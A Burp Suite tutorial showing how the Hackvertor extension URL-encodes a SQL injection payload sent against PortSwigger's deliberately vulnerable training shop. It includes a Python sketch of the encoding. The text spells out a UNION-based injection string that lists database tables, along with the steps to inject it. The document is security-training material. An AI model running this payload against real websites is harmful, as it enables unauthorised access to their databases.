Getting started with Hackvertor

Tutorial: SQL injection attack

Try Hackvertor for yourself

Hackvertor in action

URL encoding a SQL statement 🎦

To help you understand how you might use Hackvertor, we’ll use the extension to insert <@urlencode> and </@urlencode> tags into a GET request. Hackvertor will then automatically convert tagged HTTP traffic into something that can be used in a SQL injection attack when the request is sent.
Not a Burp Suite customer? You can try this tutorial using the free Burp Suite Community Edition, which you can .
In this example, we’ve identified a potential SQL injection vulnerability in PortSwigger’s fake web store. We can launch a SQL injection attack on this store to retrieve a list of tables from its database by inserting the following statement into the category parameter in a GET request, but we’ll need to encode it first:
' UNION SELECT table_name, NULL FROM information_schema.tables--
Compare this to Burp Suite’s built-in encoding. Without Hackvertor, Burp Suite could URL-encode that statement instantly. To change the statement, though, we would have to decode it and edit it every time we iterate on it, until we reach a successful SQL injection attack.
The URL-encoded statement below isn’t too complex. But if our first attempt to launch the attack failed, we might have to decode this statement to ensure we’re making the right changes:
%27+UNION+SELECT+table_name%2C+NULL+FROM+information_schema.tables--

Steps in this tutorial

In the example below, we will:
Visit a fake online shop with Burp Suite’s built-in browser, which will generate a GET request.
Transfer that GET request into Repeater, and inject a SQL statement.
Use Hackvertor to apply <@urlencode> tags to convert that SQL statement into something URL friendly.
Warning: When following this tutorial, only the website specified should be targeted.

Step 1: Prepare HTTP traffic

In Burp Suite, click the Proxy tab.
Under the Proxy tab, click the Intercept tab. Then click Open Browser.
Paste the following URL into the address bar of Burp Suite’s browser:
Click Access the lab, which will take you to the fake online shop.
In the browser, under We Like To Shop, click the Pets search filter.
In Burp Suite, under the Proxy tab, click the HTTP History tab. Find a row where the URL column begins with /filter?category. Pets will be the value of this 'category' parameter.
Right-click this row. In the pop-up menu, click Send to Repeater.
At the top of Burp Suite, click the Repeater tab.
In the Request editor, replace Pets with the following SQL statement: ' UNION SELECT table_name, NULL FROM information_schema.tables--
The top line of the request should now look like the screenshot below:
[Screenshot: top line of the request in the Request editor]

Step 2: Convert data and launch attack

Now we’ve got our example HTTP traffic ready in the Repeater tab, we can prepare that data by inserting <@urlencode> tags ready for conversion:
First, we need to change the HTTP protocol to HTTP/1.1 to prevent the SQL statement being truncated on send, as explained below:
To the right side of the Repeater tab: Under Inspector, click Request Attributes.
Next to Protocol, click HTTP/1.1.
In the Repeater tab, drag-select the SQL statement that was previously inserted into the GET request.
Right-click and hover over Extensions. Then hover over Hackvertor.
Hover over Encode. Then click urlencode.
Above the Request editor, click Send. Hackvertor will now encode the SQL statement for you as it sends the request.
In the Response box, the contents of the response confirm that:
Hackvertor encoded the statement inside the <@urlencode> tags successfully: the server returned a 200 response, whereas it would have rejected the request if the SQL statement had not been URL-friendly.
The SQL injection attack was successful, as the response includes a list of tables from the website’s SQL database.
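
What the tags do when the request is sent, as an added Python sketch (not Hackvertor's code and not part of the original tutorial): the tagged span is replaced by its URL-encoded form, the request line becomes well formed, and the server decodes the parameter back to the original statement. It assumes Python's quote_plus, which reproduces the encoded statement shown earlier; the function names and the constructed request lines are illustrative.

```python
import re
from urllib.parse import quote_plus, urlsplit, parse_qs

# Tag syntax as written in this tutorial: <@urlencode> ... </@urlencode>
TAG = re.compile(r"<@urlencode>(.*?)</@urlencode>", re.DOTALL)


def expand_tags(text: str) -> str:
    """Replace each tagged span with its URL-encoded form; the tags are dropped."""
    return TAG.sub(lambda m: quote_plus(m.group(1)), text)


def well_formed(request_line: str) -> bool:
    """An HTTP request line is exactly: method SP target SP version."""
    return len(request_line.split(" ")) == 3


def server_view(request_line: str) -> dict:
    """Decode the query string as a server (or someone reviewing logs) would."""
    _method, target, _version = request_line.split(" ", 2)
    return {k: v[0] for k, v in parse_qs(urlsplit(target).query).items()}


STATEMENT = "' UNION SELECT table_name, NULL FROM information_schema.tables--"

# Constructed request lines; path and parameter name are those seen in Step 1.
RAW = f"GET /filter?category={STATEMENT} HTTP/1.1"  # untagged, unencoded
EDITED = f"GET /filter?category=<@urlencode>{STATEMENT}</@urlencode> HTTP/1.1"
SENT = expand_tags(EDITED)  # what leaves Repeater after conversion

if __name__ == "__main__":
    print("raw well formed :", well_formed(RAW))   # spaces split the target
    print("in the editor   :", EDITED)
    print("on the wire     :", SENT)
    print("sent well formed:", well_formed(SENT))
    print("server decodes  :", server_view(SENT))
```

The decoded value is identical to the statement typed in the editor, which is why proxy or access logs need to be URL-decoded before they are searched for strings such as information_schema.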
